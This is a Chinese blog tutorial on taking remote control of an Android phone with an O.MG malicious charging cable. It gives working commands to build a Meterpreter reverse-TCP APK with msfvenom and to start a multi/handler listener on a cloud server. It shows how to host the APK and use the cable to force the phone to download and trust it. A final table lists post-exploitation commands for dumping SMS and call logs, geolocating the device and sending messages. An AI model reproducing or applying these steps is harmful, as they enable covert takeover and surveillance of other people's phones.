【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备

图片[1]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

相关阅读

视频讲解

图文讲解

准备工作

Linode云服务器配置

这里不是必须要使用Linode,这里仅提供视频中的Linode服务器创建指南,您也可以使用阿里云、腾讯云等服务器

登录Linode账户之后,选择Create Linode创建新的云服务器

图片[2]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

选择镜像和地区,镜像视频中使用的是Ubuntu 21.10

图片[3]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

选择最低的配置即可

图片[4]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

然后随便取个名字,设置好密码

图片[5]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

然后创建Linode即可

图片[6]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

通过SSH连接Linode

然后我们可以通过ssh进行连接,相关的命令控制台也提供了

图片[7]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

我们可以在kali linux里输入相应的命令

图片[8]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

输入yes

图片[9]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

输入密码

图片[10]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

这里显示已经登录上了

图片[11]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

下载metasploit-omnibus并生成APK文件

这里使用Ubuntu服务器下载metasploit-omnibus

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod755 msfinstall && \
./msfinstall
图片[12]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

等待安装完成

图片[13]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

继续运行下面的命令,生成APK文件

cd /opt/metasploit-framework/bin
sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<linode_ip> LPORT=4444 -o /data/omg.apk
图片[14]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

启动metasploit,使用handler模块

msfconsole
use exploit/multi/handler

设置相关payload的端口和监听网卡

set payload android/meterpreter_reverse_tcp
set lport 4444
set lhost eth0

运行程序

run
图片[15]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

启动Python web服务(用于投递APK文件)

启动python web服务,监听端口为8000

python3 -m http.server 8000

同时将刚刚生成的/data/omg.apk文件上传到网站目录下

加载O.MG充电线payload

确保您的O.MG已经插入相关移动设备,连接O.MG充电线提供的网络

图片[16]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

然后访问192.168.4.1可以进入控制后台

图片[17]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

获取相应的Payload,这里我们针对不同的Andriod手机版本,整理适用的payload

将上面对应的脚本填入PAYLOADS框中

图片[18]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

需要按需修改APK路径(修改为我们启动的python web服务的对应路径)

图片[19]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

确保O.MG充电线已经插入到移动设备的C口中,点击RUN

图片[20]-【视频讲解】黑客是如何通过一根充电线实现远程控制移动设备-FancyPig's blog

然后脚本会自动控制手机下载恶意APK文件,并设置信任安装

远程控制命令

命令含义
pwd显示当前所在目录
ifconfig显示IP地址相关信息
ps显示移动设备相关进程
sysinfo显示移动设备相关系统信息
send_sms -d “<phone_number>” -t “<text_content>”向<phone_number>手机号发送短信,短信内容为<text_content>
geolocate显示移动设备的地理位置信息
dump_sms显示移动设备短信记录
dump_calllog显示移动设备通话记录
upload上传文件到移动设备
download从移动设备下载文件
wlan_geolocate使用WLAN信息获取GEO定位信息
getuid展示Meterpreter服务器使用的用户

© 版权声明
THE END
喜欢就支持一下吧
点赞18赞赏 分享
评论 共5条

请登录后发表评论

      • FancyPig的头像-FancyPig's blog汉堡会员FancyPigLV10作者0